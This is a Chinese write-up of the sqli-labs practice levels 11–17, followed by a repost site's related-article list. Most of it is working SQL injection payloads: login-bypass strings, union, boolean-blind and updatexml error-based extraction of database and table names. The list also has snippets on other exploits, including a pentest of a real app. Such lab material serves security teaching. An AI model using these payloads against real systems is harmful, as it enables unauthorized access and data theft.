sqli-lab———writeup(11~17)

less11

用戶名提交單引號顯示sql語法錯誤,故存在sql注入
在這里插入圖片描述

根據單引號報錯,在用戶名和密碼任意行輸入 萬能密碼:‘ or 1=1#

輸入后username語句為:SELECT username, password FROM users WHERE username='' or 1=1; 雙引號
password語句:Select * from admin where username='admin' and password='' or 1=1# 單引號

在這里插入圖片描述
還有比如:1'union select 1,database()#

在這里插入圖片描述

less12

輸入雙引號有報出sql語法錯誤
在這里插入圖片描述
根據雙引號報錯,語句為:") or 1=1#
在這里插入圖片描述

less13:

查看注入類型
在這里插入圖片描述

分別為") or 1=1#') or 1=1#
兩種方式都分別嘗試過
結果都一樣,只顯示進入,但是不顯示數據庫內容
在這里插入圖片描述

看來又是盲注了
使用語句:username=admin')and left(database(),1)>'a'#&password=任意密碼
二分法或burp工具

less14

引號測試:
在這里插入圖片描述
username:'")or 1=1# 單引號雙引號
password:")or 1=1# 雙引號

over~

less15

輸入任何內容回顯都一樣,判斷為布爾盲注和時間盲注
語句:’ or 1=1#

less16

同15:" or 1=1# 換成雙引號

less17

看源碼:

function check_input($value){if(!empty($value)){// truncation (see comments)$value = substr($value,0,15);}// Stripslashes if magic quotes enabledif (get_magic_quotes_gpc()){$value = stripslashes($value);}// Quote if not a numberif (!ctype_digit($value)){$value = "'" . mysql_real_escape_string($value) . "'";}else{$value = intval($value);}return $value;}

知識點:

函數get_magic_quotes_gpc()

當magic_quotes_gpc=On的時候,函數get_magic_quotes_gpc()就會返回1

當magic_quotes_gpc=Off的時候,函數get_magic_quotes_gpc()就會返回0

magic_quotes_gpc函數在php中的作用是判斷解析用戶提示的數據,如包括有:post、get、cookie過來的數據增加轉義字符“\”,以確保這些數據不會引起程序,特別是數據庫語句因為特殊字符引起的污染而出現致命的錯誤。

在magic_quotes_gpc = On的情況下,如果輸入的數據有

單引號(’)、雙引號(”)、反斜線(\)與 NULL(NULL 字符)等字符都會被加上反斜線。

stripslashes()刪除由 addslashes() 函數添加的反斜杠

ctype_digit()判斷是不是數字,是數字就返回true,否則返回false

mysql_real_escape_string()轉義 SQL 語句中使用的字符串中的特殊字符。

intval() 整型轉換

這一關中不能對username下手 要從passwordd開始

過程:

17關對username進行了嚴格的過濾

注入的格式:

admin' or updatexml(1, (concat('#',(payload))), 1) #

payload可以換成需要查詢的函數

數據庫名

admin' or updatexml(1, concat('#', database()), 1) #

表名

updatexml(1, concat("#", (select group_concat(table_name) from information_schema.tables where table_schema="security")), 0) #

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/532591.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/532591.shtml
英文地址,請注明出處:http://en.pswp.cn/news/532591.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

深入理解Python中的全局解釋鎖GIL

深入理解Python中的全局解釋鎖GIL 轉自:https://zhuanlan.zhihu.com/p/75780308 注:本文為蝸牛學院資深講師卿淳俊老師原創,首發自公眾號https://mp.weixin.qq.com/s/TBiqbSCsjIbNIk8ATky-tg,如需轉載請私聊我處獲得授權并注明出處…

sqli-lab————Writeup(18~20)各種頭部注入

less18 基于錯誤的用戶代理,頭部POST注入 admin admin 登入成功(進不去重置數據庫) 顯示如下 有user agent參數,可能存在注入點 顯示版本號: 爆庫:User-Agent:and extractvalue(1,concat(0x7e,(select …

Python GIL

轉自:https://blog.csdn.net/weixin_41594007/article/details/79485847 Python GIL 在進行GIL講解之前,我們可以先回顧一下并行和并發的區別: 并行:多個CPU同時執行多個任務,就好像有兩個程序,這兩個程序…

sqli-lab——Writeup21~38(各種過濾繞過WAF和)

Less-21 Cookie Injection- Error Based- complex - string ( 基于錯誤的復雜的字符型Cookie注入) base64編碼,單引號,報錯型,cookie型注入。 本關和less-20相似,只是cookie的uname值經過base64編碼了。 登錄后頁面:…

Libtorch報錯:terminate called after throwing an instance of ‘c10::Error‘ what():isTensor()INTERNAL ASS

Libtorch報錯:terminate called after throwing an instance of ‘c10::Error’ what(): isTensor() INTERNAL ASSERT FAILED 報錯 問題出現在筆者想要將 yolov5 通過 PyTorch 的 C 接口 Libtorch 部署到樹莓派上。 完整報錯信息: terminate called …

sqli-lab——Writeup(38~over)堆疊等......

知識點: 1.堆疊注入原理(stacked injection) 在SQL中,分號(;)是用來表示一條sql語句的結束。試想一下我們在 ; 結束一個sql語句后繼續構造下一條語句,會不會一起執行?因此這個想法…

mysql常規使用(建立,增刪改查,視圖索引)

目錄 1.數據庫建立 2.增刪改查 3.視圖建立: 1.數據庫建立 mysql> mysql> show databases; ----------------------------------- | Database | ----------------------------------- | information_schema | | ch…

php操作mysql數據庫

phpmyadmin phpadmin是一個mysql圖形化管理工具,是一款實用php開發的mysql苦戶端軟件,基于web跨平臺的管理系統,支持簡體中文,官網:www.phpmyadmin.net可以下載免費最新版。提供圖形化操作界面,完成對mysq…

C:C++ 函數返回多個參數

C/C 函數返回多個參數 轉自:https://blog.csdn.net/onlyou2030/article/details/48174461 筆者是 Python 入門的,一直很困惑 C/C 中函數如何返回多個參數。 如果一個函數需要返回多個參數,可以采用以下兩種方法: 傳引用或指針…

sql預編譯

一.數據庫預編譯起源: 數據庫接受sql語句,需要解析和制定執行,中間需要花費一段時間. 有時候同一語句可能會多次執行, 那么就會造成資源的浪費 如何減少編譯執行的時間 ? 就有了預編譯,預編譯是將這類語句提前用占位符替代,一次編譯,多次執行. 預編譯后的執行代碼會被緩存下來…

C++中智能指針的原理、使用、實現

C中智能指針的原理、使用、實現 轉自:https://www.cnblogs.com/wxquare/p/4759020.html 1 智能指針的作用 C程序設計中使用堆內存是非常頻繁的操作,堆內存的申請和釋放都由程序員自己管理。程序員自己管理堆內存可以提高了程序的效率,但是…

Xctf練習sql注入--supersqli

三種方法 方法一 1 回顯正常 1’回顯不正常,報sql語法錯誤 1’ -- 回顯正常,說明有sql注入點,應該是字符型注入(# 不能用) 1’ order by 3 -- 回顯失敗,說明有2個注入點 1’ union select 1,2 -- 回顯顯示過濾語句: 1’; show databases -- 爆數據庫名 -1’; show tables …

深拷貝與淺拷貝、值語義與引用語義對象語義 ——以C++和Python為例

深拷貝與淺拷貝、值語義與引用語義/對象語義 ——以C和Python為例 值語義與引用語義(對象語義) 本小節參考自:https://www.cnblogs.com/Solstice/archive/2011/08/16/2141515.html 概念 在任何編程語言中,區分深淺拷貝的關鍵都…

一次打卡軟件的實戰滲透測試

直接打卡抓包, 發現有疑似企業網站,查ip直接顯示以下頁面 直接顯示了后臺安裝界面…就很有意思 探針和phpinfo存在 嘗試連接mysql失敗 fofa掃描為阿里云服務器 找到公司官網使用nmap掃描,存在端口使用onethink 查詢onethink OneThink是一個開源的內容管理框架,…

C++中類的拷貝控制

C中類的拷貝控制 轉自:https://www.cnblogs.com/ronny/p/3734110.html 1,什么是類的拷貝控制 當我們定義一個類的時候,為了讓我們定義的類類型像內置類型(char,int,double等)一樣好用,我們通常需要考下面…

centos7ubuntu搭建Vulhub靶場(推薦Ubuntu)

這里寫目錄標題一.前言總結二.成功操作:三.出現報錯:四.vulhub使用正文:一.前言總結二.成功操作:三.出現報錯:四.vulhub使用看完點贊關注不迷路!!!! 后續繼續更新優質安全內容!!!!!一.前言總結 二.成功操作&#xff1…

使用 PyTorch 數據讀取,JAX 框架來訓練一個簡單的神經網絡

使用 PyTorch 數據讀取,JAX 框架來訓練一個簡單的神經網絡 本文例程部分主要參考官方文檔。 JAX簡介 JAX 的前身是 Autograd ,也就是說 JAX 是 Autograd 升級版本,JAX 可以對 Python 和 NumPy 程序進行自動微分。可以通過 Python的大量特征…

Yapi Mock 遠程代碼執行漏洞

跟風一波復現Yapi 漏洞描述: YApi接口管理平臺遠程代碼執行0day漏洞,攻擊者可通過平臺注冊用戶添加接口,設置mock腳本從而執行任意代碼。鑒于該漏洞目前處于0day漏洞利用狀態,強烈建議客戶盡快采取緩解措施以避免受此漏洞影響 …

C++ ACM模式輸入輸出

C ACM模式輸入輸出 以下我們都以求和作為題目要求,來看一下各種輸入輸出應該怎么寫。 1 只有一個或幾個輸入 輸入樣例: 3 5 7輸入輸出模板: int main() {int a, b, c;// 接收有限個輸入cin >> a >> b >> c;// 輸出結果…

CVE-2017-10271 WebLogic XMLDecoder反序列化漏洞

漏洞產生原因: CVE-2017-10271漏洞產生的原因大致是Weblogic的WLS Security組件對外提供webservice服務,其中使用了XMLDecoder來解析用戶傳入的XML數據,在解析的過程中出現反序列化漏洞,導致可執行任意命令。攻擊者發送精心構造的…